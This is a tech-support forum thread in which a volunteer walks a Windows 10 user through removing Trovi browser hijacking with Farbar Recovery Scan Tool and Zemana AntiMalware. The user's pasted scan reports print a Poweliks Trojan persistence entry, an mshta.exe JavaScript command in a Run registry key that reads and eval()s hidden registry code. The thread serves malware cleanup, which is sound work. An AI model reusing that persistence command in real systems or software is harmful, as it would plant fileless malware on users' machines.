Please Help RE: Trovi

[Barb K]

I hope some one can help me. I have 2 laptops. Using Windows 10 and Firefox on both. I would love to us Google Chrome but every time I install I get Trovi malware. I remove an every time I restart it comes back. This happens on both laptops. I have installed Malware removal tool but nothing helps.I have asked friends nd family, they all use Google chrome without any problems. Forgot to mention, before I download Chrome I remove Firefox.I am so frustrated Please HELP

 

[TwinHeadedEagle]

Hello,


Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them.
Only one of them will run on your system, that will be the right version.

• Double-click to run it. When the tool opens click Yes to disclaimer.
• Press Scan button.
  
  
  
  
  
• It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
• The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

 

[Barb K]

Hello,


Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them.
Only one of them will run on your system, that will be the right version.

• Double-click to run it. When the tool opens click Yes to disclaimer.
• Press Scan button.
  
  
  
  
  
• It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
• The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

Ok I found your reply, I am scanning now, I will reply with results Thank you

 

[Barb K]

Hello,


Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them.
Only one of them will run on your system, that will be the right version.

• Double-click to run it. When the tool opens click Yes to disclaimer.
• Press Scan button.
  
  
  
  
  
• It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
• The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

 

[Barb K]

Just sent you the files Thank you

 

[TwinHeadedEagle]

Please download Zemana AntiMalware and save it to your Desktop.

• Install the program and once the installation is complete it will start automatically.
• Without changing any options, press Scan to begin.
• After the short scan is finished, if threats are detected press Next to remove them.

Note: If restart is required to finish the cleaning process, you should click Reboot. If reboot isn't required, please restart your computer manually.​

• Open Zemana AntiMalware again.
• Click on
  
  icon and double click the latest report.
• Now click File > Save As and choose your Desktop before pressing Save.
• The only left thing is to attach saved report in your next message.

 

[Barb K]

Please download Zemana AntiMalware and save it to your Desktop.

• Install the program and once the installation is complete it will start automatically.
• Without changing any options, press Scan to begin.
• After the short scan is finished, if threats are detected press Next to remove them.

Note: If restart is required to finish the cleaning process, you should click Reboot. If reboot isn't required, please restart your computer manually.​

• Open Zemana AntiMalware again.
• Click on
  
  icon and double click the latest report.
• Now click File > Save As and choose your Desktop before pressing Save.
• The only left thing is to attach saved report in your next message.

Zemana AntiMalware 2.50.2.133 (Installed)
-------------------------------------------------------
Scan Result : Completed
Scan Date : 2016/10/25
Operating System : Windows 10 64-bit
Processor : 4X Intel(R) Pentium(R) CPU N3540 @ 2.16GHz
BIOS Mode : UEFI
CUID : 12AA21D3752AB8CF9BA1B7
Scan Type : Smart Scan
Duration : 8m 19s
Scanned Objects : 44108
Detected Objects : 11
Excluded Objects : 0
Read Level : SCSI
Auto Upload : Enabled
Detect All Extensions : Disabled
Scan Documents : Disabled
Domain Info : WORKGROUP,0,2
Detected Objects
-------------------------------------------------------
Internet Explorer Homepage
Status : Scanned
Object : FromDocToPDF
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Suspicious Browser Setting
Cleaning Action : Repair
Related Objects :
Browser Setting - Internet Explorer Homepage
Chrome Startup Url
Status : Scanned
Object : Search
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Suspicious Browser Setting
Cleaning Action : Repair
Related Objects :
Browser Setting - Chrome Startup Url
Chrome Homepage
Status : Scanned
Object : Search
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Suspicious Browser Setting
Cleaning Action : Repair
Related Objects :
Browser Setting - Chrome Homepage
iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : AD09A75E04A6F259F7A94D9D3BFAF2BD
Publisher : Microsoft Corporation
Size : 825536
Version : 11.0.14393.0
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 29188
File - %programfiles%\internet explorer\iexplore.exe
iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : AD09A75E04A6F259F7A94D9D3BFAF2BD
Publisher : Microsoft Corporation
Size : 825536
Version : 11.0.14393.0
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 10940
File - %programfiles%\internet explorer\iexplore.exe
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 14084 - C:\Windows\SysWOW64\explorer.exe
File - %systemroot%\syswow64\explorer.exe
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 9632 - C:\Windows\SysWOW64\explorer.exe
File - %systemroot%\syswow64\explorer.exe
Trojan:Win32/Poweliks
Status : Scanned
Object : HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Malware
Cleaning Action : Delete
Related Objects :
Registry Entry - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\WINDOWS\system32\mshta.exe" javascript:Oo84KN="ZXj";E39b=new%20ActiveXObject("WScript.Shell");yw6NxDC="aulaniK";TW5KU=E39b.RegRead("HKCU\\software\\naurid\\xbqoercc");Dotv2="le";eval(TW5KU);oPxxHW5t="0";ifest
2c2f011a
Status : Scanned
Object : 2c2f011a
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/Kovter-DJ!Intr
Cleaning Action : Delete
Related Objects :
Registry Entry - HKCU\SOFTWARE\Classes\2c2f011a\@ =
setup.exe
Status : Scanned
Object : %userprofile%\downloads\setup.exe
MD5 : A9FDD608D3810C5C40FC9D7A7663673D
Publisher : SUPER TUNEUP TECHNOLOGIES LLP
Size : 4107608
Version : 4.5.0.0
Detection : Scareware:Win32/NonBeneficialWindowsOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %userprofile%\downloads\setup.exe
setup(1).exe
Status : Scanned
Object : %userprofile%\downloads\setup(1).exe
MD5 : A9FDD608D3810C5C40FC9D7A7663673D
Publisher : SUPER TUNEUP TECHNOLOGIES LLP
Size : 4107608
Version : 4.5.0.0
Detection : Scareware:Win32/NonBeneficialWindowsOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %userprofile%\downloads\setup(1).exe

Cleaning Result
-------------------------------------------------------
Cleaned : 7
Reported as safe : 0
Failed : 4
Failed Objects
-------------------------------------------------------
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 9632
File - %systemroot%\syswow64\explorer.exe

explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 14084
File - %systemroot%\syswow64\explorer.exe

iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : AD09A75E04A6F259F7A94D9D3BFAF2BD
Publisher : Microsoft Corporation
Size : 825536
Version : 11.0.14393.0
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 10940
File - %programfiles%\internet explorer\iexplore.exe

iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : AD09A75E04A6F259F7A94D9D3BFAF2BD
Publisher : Microsoft Corporation
Size : 825536
Version : 11.0.14393.0
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 29188
File - %programfiles%\internet explorer\iexplore.exe

 

[Barb K]

Please download Zemana AntiMalware and save it to your Desktop.

• Install the program and once the installation is complete it will start automatically.
• Without changing any options, press Scan to begin.
• After the short scan is finished, if threats are detected press Next to remove them.

Note: If restart is required to finish the cleaning process, you should click Reboot. If reboot isn't required, please restart your computer manually.​

• Open Zemana AntiMalware again.
• Click on
  
  icon and double click the latest report.
• Now click File > Save As and choose your Desktop before pressing Save.
• The only left thing is to attach saved report in your next message.

 

[Barb K]

Please download Zemana AntiMalware and save it to your Desktop.

• Install the program and once the installation is complete it will start automatically.
• Without changing any options, press Scan to begin.
• After the short scan is finished, if threats are detected press Next to remove them.

Note: If restart is required to finish the cleaning process, you should click Reboot. If reboot isn't required, please restart your computer manually.​

• Open Zemana AntiMalware again.
• Click on
  
  icon and double click the latest report.
• Now click File > Save As and choose your Desktop before pressing Save.
• The only left thing is to attach saved report in your next message.

There are 4 that cannot be removed?

 

[Barb K]

Please download Zemana AntiMalware and save it to your Desktop.

• Install the program and once the installation is complete it will start automatically.
• Without changing any options, press Scan to begin.
• After the short scan is finished, if threats are detected press Next to remove them.

Note: If restart is required to finish the cleaning process, you should click Reboot. If reboot isn't required, please restart your computer manually.​

• Open Zemana AntiMalware again.
• Click on
  
  icon and double click the latest report.
• Now click File > Save As and choose your Desktop before pressing Save.
• The only left thing is to attach saved report in your next message.

Zemana AntiMalware 2.50.2.133 (Installed)
-------------------------------------------------------
Scan Result : Completed
Scan Date : 2016/10/25
Operating System : Windows 10 64-bit
Processor : 4X Intel(R) Pentium(R) CPU N3540 @ 2.16GHz
BIOS Mode : UEFI
CUID : 12AA21D3752AB8CF9BA1B7
Scan Type : Deep Scan
Duration : 47m 4s
Scanned Objects : 227185
Detected Objects : 5
Excluded Objects : 0
Read Level : SCSI
Auto Upload : Enabled
Detect All Extensions : Disabled
Scan Documents : Disabled
Domain Info : WORKGROUP,0,2
Detected Objects
-------------------------------------------------------
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 4732 - C:\Windows\SysWOW64\explorer.exe
File - %systemroot%\syswow64\explorer.exe
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 4512 - C:\Windows\SysWOW64\explorer.exe
File - %systemroot%\syswow64\explorer.exe
Trojan:Win32/Poweliks
Status : Scanned
Object : HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dqxtwmdv
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Malware
Cleaning Action : Delete
Related Objects :
Registry Entry - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dqxtwmdv = "C:\WINDOWS\system32\mshta.exe" javascript:nq6IAp6hs="Ugq";H5n=new%20ActiveXObject("WScript.Shell");q2Rak6="3";tp2aR=H5n.RegRead("HKCU\\software\\naurid\\xbqoercc");aRDLqrI6="fJ";eval(tp2aR);MIX3A="d3OG";
2c2f011a
Status : Scanned
Object : 2c2f011a
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/Kovter-DJ!Intr
Cleaning Action : Delete
Related Objects :
Registry Entry - HKCU\SOFTWARE\Classes\2c2f011a\@ =
TooltabExtension.dll
Status : Scanned
Object : %localappdata%\fromdoctopdftooltab\tooltabextension.dll
MD5 : EC1BFBF4644F87A91A6CADEE9CD10756
Publisher : Mindspark Interactive Network
Size : 255600
Version : 2.1.1.16130
Detection : Adware:Win32/Mindspark!Ep
Cleaning Action : Quarantine
Related Objects :
File - %localappdata%\fromdoctopdftooltab\tooltabextension.dll

Cleaning Result
-------------------------------------------------------
Cleaned : 3
Reported as safe : 0
Failed : 2
Failed Objects
-------------------------------------------------------
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 4512
File - %systemroot%\syswow64\explorer.exe

explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 4732
File - %systemroot%\syswow64\explorer.exe

 

[Barb K]

There are 4 that cannot be removed?

deep scan results..
Zemana AntiMalware 2.50.2.133 (Installed)
-------------------------------------------------------
Scan Result : Completed
Scan Date : 2016/10/25
Operating System : Windows 10 64-bit
Processor : 4X Intel(R) Pentium(R) CPU N3540 @ 2.16GHz
BIOS Mode : UEFI
CUID : 12AA21D3752AB8CF9BA1B7
Scan Type : Deep Scan
Duration : 47m 4s
Scanned Objects : 227185
Detected Objects : 5
Excluded Objects : 0
Read Level : SCSI
Auto Upload : Enabled
Detect All Extensions : Disabled
Scan Documents : Disabled
Domain Info : WORKGROUP,0,2
Detected Objects
-------------------------------------------------------
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 4732 - C:\Windows\SysWOW64\explorer.exe
File - %systemroot%\syswow64\explorer.exe
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 4512 - C:\Windows\SysWOW64\explorer.exe
File - %systemroot%\syswow64\explorer.exe
Trojan:Win32/Poweliks
Status : Scanned
Object : HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dqxtwmdv
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Malware
Cleaning Action : Delete
Related Objects :
Registry Entry - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dqxtwmdv = "C:\WINDOWS\system32\mshta.exe" javascript:nq6IAp6hs="Ugq";H5n=new%20ActiveXObject("WScript.Shell");q2Rak6="3";tp2aR=H5n.RegRead("HKCU\\software\\naurid\\xbqoercc");aRDLqrI6="fJ";eval(tp2aR);MIX3A="d3OG";
2c2f011a
Status : Scanned
Object : 2c2f011a
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/Kovter-DJ!Intr
Cleaning Action : Delete
Related Objects :
Registry Entry - HKCU\SOFTWARE\Classes\2c2f011a\@ =
TooltabExtension.dll
Status : Scanned
Object : %localappdata%\fromdoctopdftooltab\tooltabextension.dll
MD5 : EC1BFBF4644F87A91A6CADEE9CD10756
Publisher : Mindspark Interactive Network
Size : 255600
Version : 2.1.1.16130
Detection : Adware:Win32/Mindspark!Ep
Cleaning Action : Quarantine
Related Objects :
File - %localappdata%\fromdoctopdftooltab\tooltabextension.dll

Cleaning Result
-------------------------------------------------------
Cleaned : 3
Reported as safe : 0
Failed : 2
Failed Objects
-------------------------------------------------------
explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 4512
File - %systemroot%\syswow64\explorer.exe

explorer.exe
Status : Scanned
Object : %systemroot%\syswow64\explorer.exe
MD5 : 97EFD2087A51AD739A8DED87D4DA86A1
Publisher : Microsoft Windows
Size : 4311736
Version : 6.3.14393.206
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
Process - 4732
File - %systemroot%\syswow64\explorer.exe

 

[TwinHeadedEagle]

Please only use Upload a File button, don't paste reports.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

• Right-click on
  
  icon and select
  
  Run as Administrator to start the tool.
  (XP users click run after receipt of Windows Security Warning - Open File).
• Make sure that Addition.txt option is checked.
  
  
  
  
  
• Press Scan button and wait.
• The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please attach report into your next reply.

 

[Barb K]

Please only use Upload a File button, don't paste reports.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

• Right-click on
  
  icon and select
  
  Run as Administrator to start the tool.
  (XP users click run after receipt of Windows Security Warning - Open File).
• Make sure that Addition.txt option is checked.
  
  
  
  
  
• Press Scan button and wait.
• The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please attach report into your next reply.

The highlighted blue link you sent for Farbar doesn't work. Google searched it and it gave me links to download but they all give me this message from windows stating FRST64.exe will harm my computer, tried to press on save but message came up again. Can you please send me the link to Farbar again? Thank you for your patients

 

[Barb K]

Please only use Upload a File button, don't paste reports.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

• Right-click on
  
  icon and select
  
  Run as Administrator to start the tool.
  (XP users click run after receipt of Windows Security Warning - Open File).
• Make sure that Addition.txt option is checked.
  
  
  
  
  
• Press Scan button and wait.
• The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please attach report into your next reply.

Ok, got it here are the attachments

 

[Barb K]

Please only use Upload a File button, don't paste reports.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

• Right-click on
  
  icon and select
  
  Run as Administrator to start the tool.
  (XP users click run after receipt of Windows Security Warning - Open File).
• Make sure that Addition.txt option is checked.
  
  
  
  
  
• Press Scan button and wait.
• The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please attach report into your next reply.

second file

 

[TwinHeadedEagle]

Both reports are same. Can you please attach them both together after scan. And please move Farbar tool to your Desktop.

 

[Barb K]

Please only use Upload a File button, don't paste reports.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

• Right-click on
  
  icon and select
  
  Run as Administrator to start the tool.
  (XP users click run after receipt of Windows Security Warning - Open File).
• Make sure that Addition.txt option is checked.
  
  
  
  
  
• Press Scan button and wait.
• The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please attach report into your next reply.

Ok, Did it again, could not save the program to my desktop don't know how but I m attaching 2 new reports

 

[TwinHeadedEagle]

Please uninstall:

FromDocToPDF Internet Explorer Homepage and New Tab

Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.

Running it on another one may cause damage and render the system unstable.

​

Download attached fixlist.txt file and save it to the Desktop:

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

• Right-click on
  
  icon and select
  
  Run as Administrator to start the tool.
  (XP users click run after receipt of Windows Security Warning - Open File).
• Press the Fix button just once and wait.
• If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
• When finishes FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.

 

[JoyfulSong]

THANK YOU! THANK YOU! THANK YOU!!!!! Trovi is gone! Laptop running like a charm again!!!!!

Hello,


Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them.
Only one of them will run on your system, that will be the right version.

• Double-click to run it. When the tool opens click Yes to disclaimer.
• Press Scan button.
  
  
  
  
  
• It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
• The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.